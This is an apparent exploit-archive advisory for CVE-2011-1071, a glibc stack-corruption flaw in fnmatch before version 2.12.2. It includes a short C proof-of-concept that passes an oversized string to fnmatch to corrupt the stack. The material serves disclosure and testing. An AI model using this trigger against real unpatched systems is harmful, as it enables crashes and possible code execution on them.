GNU glibc < 2.12.2 alloca() Stack Corruption Vulnerability

2011-04-06 / 2011-04-07

Credit: Simon Berry-Byrne

Risk: High

Local: No

Remote: No

CVE: CVE-2011-1071

CWE: CWE-399

CVSS Base Score: 5.1/10

Impact Subscore: 6.4/10

Exploitability Subscore: 4.9/10

Exploit range: Remote

Attack complexity: High

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

/*
Source: http://www.securityfocus.com/bid/46563/info

GNU glibc is prone to a stack-corruption vulnerability.

An attacker can exploit this issue to execute arbitrary machine code in the context of the application that uses the affected library. Failed exploit attempts will likely crash the application.

GNU glibc versions prior to 2.12.2 are vulnerable. */

#include <err.h>
#include <fnmatch.h>
#include <locale.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, const char* argv[]) {
  size_t num_as;
  char* p;
  setlocale(LC_ALL, "en_US.UTF8");
  if (argc < 2) {
    errx(1, "Missing argument.");
  }
  num_as = atoi(argv[1]);
  if (num_as < 5) {
    errx(1, "Need 5.");
  }
  p = malloc(num_as);
  if (!p) {
    errx(1, "malloc() failed.");
  }
  memset(p, 'A', num_as);
  p[num_as - 1] = '\0';
  p[0] = 'f';
  p[1] = 'o';
  p[2] = 'o';
  p[3] = '.';
  fnmatch("*.anim[1-9j]", p, 0);
  return 0;
}

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

GNU glibc < 2.12.2 alloca() Stack Corruption Vulnerability

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

GNU glibc < 2.12.2 alloca() Stack Corruption Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.